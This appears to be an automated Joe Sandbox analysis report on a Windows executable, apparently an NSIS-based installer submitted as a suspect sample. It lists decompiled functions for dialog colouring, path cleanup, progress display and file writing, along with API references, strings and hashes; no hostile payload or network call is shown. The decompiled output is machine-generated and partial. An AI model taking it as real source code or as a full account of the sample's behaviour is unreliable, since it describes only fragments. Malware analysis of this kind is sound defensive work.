GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000), ref: 004068A4

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844
Call, xrefs: 004066CF, 00406782, 00406789, 0040678D, 004067AA, 004067BF, 004067D2, 004067E7, 00406814, 00406849, 0040684F, 0040686C, 0040687F, 0040689D, 004068A3, 004068AC, 004068E2
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E
Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll, xrefs: 004066CA

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-377030400
Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040463d
0x004046f3
0x00000000
0x004046f3
0x0040464e
0x00404652
0x00000000
0x0040466c
0x0040466c
0x00404675
0x00000000
0x00000000
0x00404677
0x00404683
0x00404686
0x00404686
0x0040468c
0x00404692
0x00404692
0x0040469e
0x004046a4
0x004046ab
0x004046ae
0x004046b1
0x004046b3
0x004046b3
0x004046bb
0x004046c1
0x004046c1
0x004046cb
0x004046d0
0x004046d3
0x004046d8
0x004046db
0x004046db
0x004046eb
0x004046eb
0x00000000
0x004046ee

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32(00000000), ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32(?), ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f1
0x004068fa
0x00406911
0x00406911
0x00406918
0x00406924
0x00406924
0x00406927
0x0040692a
0x0040692f
0x00406931
0x0040693a
0x0040693e
0x0040695b
0x00406963
0x00406963
0x00406968
0x0040696a
0x0040696d
0x00406972
0x00406973
0x00406977
0x00406977
0x00406978
0x0040697f
0x00406981
0x00406988
0x00000000
0x00000000
0x00406990
0x00406996
0x00000000
0x00000000
0x00000000
0x00406996
0x0040699b

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,762E3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
CharNextW.USER32(?,00000000,762E3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
CharPrevW.USER32(?,?,762E3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004068F0
*?|<>/":, xrefs: 00406941

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				__eflags =  *0x420efc; // 0x0
				if(__eflags != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a26c;
				if(_t6 >  *0x42a26c) {
					__eflags =  *0x42a268;
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a314 & 0x00000001;
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x00403057
0x0040305d
0x00000000
0x00403060
0x00403067
0x0040306d
0x00403073
0x00403075
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x0040307d
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00403049
GetTickCount.KERNEL32 ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32(00000000,00000064,00001425), ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f8d
0x00404f9a
0x00404fa0
0x00404fde
0x00404fde
0x00404fed
0x00404ff4
0x00000000
0x00404ff6
0x00404fa2
0x00404fb1
0x00404fb9
0x00404fbc
0x00404fce
0x00404fd4
0x00404fdb
0x00000000
0x00404fdb
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32(?,?), ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32(?,?), ref: 00402FF5
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007

Strings

verifying installer: %d%%, xrefs: 00402FDA
unpacking data: %d%%, xrefs: 00402FD3, 00402FE3

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59

Uniqueness

Uniqueness Score: -1.00%

Function 74252655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E74252655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E742512BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M74252784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x7425407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7425409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E74251510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x7425506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x7425506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x7425506c);
								goto L17;
							case 5:
								_push( *0x7425506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x74255000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E74251381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E74251312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x7425265f
0x74252661
0x74252665
0x74252674
0x74252678
0x7425267d
0x7425267d
0x74252685
0x7425268c
0x74252692
0x00000000
0x74252699
0x00000000
0x00000000
0x742526a1
0x742526a5
0x742526a8
0x742526ac
0x742526b3
0x742526b7
0x742526bd
0x742526bf
0x742526c1
0x742526c1
0x742526c8
0x00000000
0x00000000
0x742526d1
0x00000000
0x00000000
0x742526d8
0x742526de
0x742526e8
0x742526ee
0x742526f3
0x00000000
0x00000000
0x74252714
0x00000000
0x00000000
0x742526fa
0x74252700
0x74252701
0x74252703
0x00000000
0x00000000
0x7425271c
0x7425271e
0x74252724
0x7425272a
0x7425272a
0x00000000
0x00000000
0x74252692
0x7425272d
0x7425272d
0x74252732
0x74252743
0x74252743
0x74252749
0x7425274e
0x74252753
0x7425275f
0x74252764
0x00000000
0x74252769
0x74252755
0x74252756
0x7425276a
0x7425276a
0x74252753
0x7425276b
0x7425276c
0x7425276f
0x74252783

APIs

Part of subcall function 742512BB: GlobalAlloc.KERNELBASE(00000040,?,742512DB,?,7425137F,00000019,742511CA,-000000A0), ref: 742512C5

GlobalFree.KERNEL32(?), ref: 74252743
GlobalFree.KERNEL32(00000000), ref: 74252778

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 7e37b9a03e860fe121e5e3555a3c274592f83e2f0f92d77d810f2ffce2016e7b
Instruction ID: aa6982391f50d2fb4690b1228d5ee6a6fea335b918164db9166403e3ff3729e7
Opcode Fuzzy Hash: 7e37b9a03e860fe121e5e3555a3c274592f83e2f0f92d77d810f2ffce2016e7b
Instruction Fuzzy Hash: 3E31AE32724102EBD71A8F59C988E6AF7BAEB8535033445E8F141C31B4C734AA74EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
